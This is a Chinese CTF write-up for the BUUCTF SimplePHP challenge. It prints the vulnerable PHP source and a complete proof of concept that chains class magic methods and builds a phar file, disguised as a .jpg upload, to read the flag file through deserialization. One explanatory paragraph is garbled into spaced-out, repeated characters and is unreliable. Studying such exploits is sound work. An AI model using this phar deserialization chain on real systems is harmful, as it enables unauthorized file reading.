BUUCTF [SWPUCTF 2018]SimplePHP

BUUCTF [WEB][SWPUCTF 2018]SimplePHP Phar反序列化

在这里附上另一位师傅写的文章,是另一道题,相同的题型,讲得非常的详细,大家可以看一看,坐上小车直达

BUUCTF [SWPUCTF 2018]SimplePHP_第1张图片
打开题目我们很明显的看到了上传文件的板块和查看文件的板块,选择这个上传文件,显示如图
在这里插入图片描述
我们再选择查看文件的板块,url如图所示
BUUCTF [SWPUCTF 2018]SimplePHP_第2张图片
我们在’='后面输入我们想要查看的文件,发现直接就给打印出来了,之后我们根据这个查看了几个php文件,得到了如下内容:
file.php:

<?php 
header("content-type:text/html;charset=utf-8");  
include 'function.php'; 
include 'class.php'; 
ini_set('open_basedir','/var/www/html/'); 
$file = $_GET["file"] ? $_GET['file'] : ""; 
if(empty($file)) {
      
    echo "

There is no file to show!

"; } $show = new Show(); if(file_exists($file)) { $show->source = $file; $show->_show(); } else if (!empty($file)){ die('file doesn\'t exists.'); } ?>

function.php

<?php 
//show_source(__FILE__); 
include "base.php"; 
header("Content-type: text/html;charset=utf-8"); 
error_reporting(0); 
function upload_file_do() {
      
    global $_FILES; 
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 
    //mkdir("upload",0777); 
    if(file_exists("upload/" . $filename)) {
      
        unlink($filename); 
    } 
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); 
    echo ''; 
} 
function upload_file() {
      
    global $_FILES; 
    if(upload_file_check()) {
      
        upload_file_do(); 
    } 
} 
function upload_file_check() {
      
    global $_FILES; 
    $allowed_types = array("gif","jpeg","jpg","png"); 
    $temp = explode(".",$_FILES["file"]["name"]); 
    $extension = end($temp); 
    if(empty($extension)) {
      
        //echo "

请选择上传的文件:" . "

"; } else{ if(in_array($extension,$allowed_types)) { return true; } else { echo ''; return false; } } } ?>

class.php

<?php
class C1e4r
{
     
    public $test;
    public $str;
    public function __construct($name)
    {
     
        $this->str = $name;
    }
    public function __destruct()
    {
     
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
     
    public $source;
    public $str;
    public function __construct($file)
    {
     
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
     
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
     
        $this->$key = $value;
    }
    public function _show()
    {
     
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
     
            die('hacker!');
        } else {
     
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
     
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
     
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
     
    public $file;
    public $params;
    public function __construct()
    {
     
        $this->params = array();
    }
    public function __get($key)
    {
     
        return $this->get($key);
    }
    public function get($key)
    {
     
        if(isset($this->params[$key])) {
     
            $value = $this->params[$key];
        } else {
     
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
     
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?>

base.php:

<?php 
    session_start(); 
?> 
<!DOCTYPE html> 
<html> 
<head> 
    <meta charset="utf-8"> 
    <title>web3</title> 
    <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css"> 
    <script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script> 
    <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script> 
</head> 
<body> 
    <nav class="navbar navbar-default" role="navigation"> 
        <div class="container-fluid"> 
        <div class="navbar-header"> 
            <a class="navbar-brand" href="index.php">首页</a> 
        </div> 
            <ul class="nav navbar-nav navbra-toggle"> 
                <li class="active"><a href="file.php?file=">查看文件</a></li> 
                <li><a href="upload_file.php">上传文件</a></li> 
            </ul> 
            <ul class="nav navbar-nav navbar-right"> 
                <li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li> 
            </ul> 
        </div> 
    </nav> 
</body> 
</html> 
<!--flag is in f1ag.php-->

index.php:

<?php 
header("content-type:text/html;charset=utf-8");  
include 'base.php';
?> 

Phar反序列化

操作前请注意:要将 php.ini 中的 phar.readonly 选项设置为 Off,否则无法生成 phar 文件。

<?php
class TestObject {
     
}//自定义构造
$phar = new Phar("phar.phar"); //后缀名必须为 phar
$phar->startBuffering();
$phar->setStub(""); //设置 stub
$o = new TestObject();//自定义构造
$o -> data='cck';//自定义构造
$phar->setMetadata($o); //将自定义的 meta-data 存入 manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

这个就是大体的框架,之后我们把需要构造的东西替换在上边自定义构造那里

接着回到本题,我们综合进行一下分析,得到最终有用的代码段在class.php中,现在我们来对其精简一下并进行一下分析:

<?php
class C1e4r
{
     
    public $test;
    public $str;
    public function __destruct()
    {
     
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
     
    public $source;
    public $str;
    public function __toString()
    {
     
        $content = $this->str['str']->source;
        return $content;
    }
    }
class Test
{
     
    public $file;
    public $params;
   public function __get($key)
    {
     
        return $this->get($key);
    }
    public function get($key)
    {
     
        if(isset($this->params[$key])) {
     
            $value = $this->params[$key];
        } else {
     
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
     
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?>

我们来大致分析一下:

首先我们看C1e4r这个类,这里存在一个_destruct魔术方法,当对象被销毁时会被调用
然后我们看Show这个类,这里存在一个_toString魔术方法,当一个对象被当作字符串对待的时候,会触发这个魔术方法,怎样可以被当作字符串来处理呢,在C1e4r中的echo就是这个作用,所以链子的一部分就出来了:
$a=new C1e4r();
a − > s t r = n e w S h o w ( ) ; 最 后 我 们 看 T e s t 这 个 魔 术 方 法 , 可 以 看 到 依 次 调 用 g e t − > g e t − > f i l e g e t , 在 f i l e g e t 这 里 存 在 f i l e g e t c o n t e n t s 这 个 获 取 文 件 命 令 的 函 数 , 这 就 是 我 们 要 利 用 的 地 方 , 所 以 a->str=new Show(); 最后我们看Test这个魔术方法,可以看到依次调用_get -> get-> file_get,在file_get这里存在file_get_contents这个获取文件命令的函数,这就是我们要利用的地方,所以 a>str=newShow();Testget>get>filegetfilegetfilegetcontentsvalue就是我们要读取的文件的位置,来构造另一部分链子:
$b=new Test();
$b->params[value]=’/var/www/html/f1ag.php’; //f1ag.php是根据查看的某个源码上显示出来的
所以我们的思路就是C14er->Show->Test,那么我们构造POC的时候就要反着来
附上POC:

<?php
class Test
{
     
    public $str;
    public $params;
    public function __construct()
    {
     
        $this->params = array();
    }

}

class C1e4r
{
     
    public $test;
    public $str;

}

class Show
{
     
    public $source;
    public $str = array();

}
    $t = new Test();
    $c = new C1e4r();
    $s = new Show();
    $t->params['source'] = '/var/www/html/f1ag.php';
    $s->str['str'] = $t;
    $c->str = $s;


    @unlink("phar.phar");
    $phar = new Phar("phar.phar"); 
    $phar->startBuffering();
    $phar->setStub(""); 
    $phar->setMetadata($c); 
    $phar->addFromString("test.txt", "test"); 
    $phar->stopBuffering();
?>

我们在本地访问这个php文件,生成一个phar.phar文件,因为上传文件存在着上传条件,所以我们修改一下文件后缀修改为phar.jpg文件
BUUCTF [SWPUCTF 2018]SimplePHP_第3张图片
上传成功了,我们访问一下
BUUCTF [SWPUCTF 2018]SimplePHP_第4张图片
最下面那一行就是我们刚刚上传上的文件,我们读取一下
BUUCTF [SWPUCTF 2018]SimplePHP_第5张图片
将读到的内容进行base64解密
BUUCTF [SWPUCTF 2018]SimplePHP_第6张图片
得到了flag:flag{f9f8bad1-8ea3-4a92-a40a-5ff77e90c699}

你可能感兴趣的:(WEB,web,php)